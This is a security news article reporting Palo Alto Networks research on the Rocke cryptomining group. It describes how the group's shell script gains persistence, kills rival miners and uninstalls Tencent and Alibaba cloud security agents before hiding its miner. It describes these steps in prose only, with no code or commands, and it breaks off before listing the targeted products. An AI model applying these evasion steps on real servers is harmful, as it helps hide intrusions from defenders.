A group of hackers that specializes in infecting servers with cryptocurrency mining software has started disabling security software agents used in cloud environments to evade detection. Known as Rocke in the security industry, the group has been active since at least April 2018 and is known for exploiting critical vulnerabilities in web application frameworks and servers like Apache Struts, Oracle WebLogic and Adobe ColdFusion.

Once inside a server, the attackers execute shell scripts that download and install Monero cryptocurrency mining malware for Linux or Windows, depending on the server’s operating system. Researchers from Palo Alto Networks have analyzed recent samples of Rocke’s Linux shell scripts, which are believed to be related to the Xbash malware developed by a different cybercrime group called Iron. Tool overlap between different groups is not unusual, especially since many attack tools are publicly available or are sold commercially in underground markets.

However, the analyzed Rocke samples have a new feature that hasn’t been observed in coin-mining attacks before: Before deploying the coinminer, the malicious script searches for five different cloud security protection and monitoring products and uninstalls them from servers.

“These products were developed by Tencent Cloud and Alibaba Cloud (Aliyun), the two leading cloud providers in China that are expanding their business globally,” the Palo Alto Networks researchers said in a report. “To the best of our knowledge, this is the first malware family that developed the unique capability to target and remove cloud security products. This also highlights a new challenge for products in the cloud workload protection platforms market defined by Gartner.”

Shut out coinminer competitors and kill the security tools

Rocke’s malicious shell script, known as a7, performs several tasks that lay the groundwork for the coin-mining operation. First, it sets up Linux cron jobs to achieve persistence at reboot. Then it searches for and kills other cryptocurrency mining processes and adds iptables (firewall) rules to block competing coinminers from running. Finally, it uninstalls agent-based cloud security products and only then it downloads its own coinmining program, executes it, hides its process and modifies its file date so it can’t be easily found by incident responders.

The five security solutions targeted by the malware are:

Source link